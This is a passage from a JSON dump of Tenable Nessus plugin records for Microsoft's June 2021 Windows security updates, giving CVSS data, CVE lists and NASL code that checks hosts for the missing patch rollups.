script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:53", "description": "The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003681: Windows Server 2012 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003681.NASL", "href": "https://www.tenable.com/plugins/nessus/150354", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150354);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003671\");\n script_xref(name:\"MSKB\", value:\"5003681\");\n script_xref(name:\"MSFT\", value:\"MS21-5003671\");\n script_xref(name:\"MSFT\", value:\"MS21-5003681\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003681: Windows Server 2012 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003671\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003681\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003681',\n '5003671'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003681, 5003671])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:53", "description": "The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003646.NASL", "href": "https://www.tenable.com/plugins/nessus/150374", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150374);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003646\");\n script_xref(name:\"MSFT\", value:\"MS21-5003646\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003646\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003646\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003646'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003646])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:53", "description": "The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003687.NASL", "href": "https://www.tenable.com/plugins/nessus/150353", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150353);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003687\");\n script_xref(name:\"MSFT\", value:\"MS21-5003687\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003687\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003687'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003687])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:28:08", "description": "The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003638.NASL", "href": "https://www.tenable.com/plugins/nessus/150367", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150367);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003638\");\n script_xref(name:\"MSFT\", value:\"MS21-5003638\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003638\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003638\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n 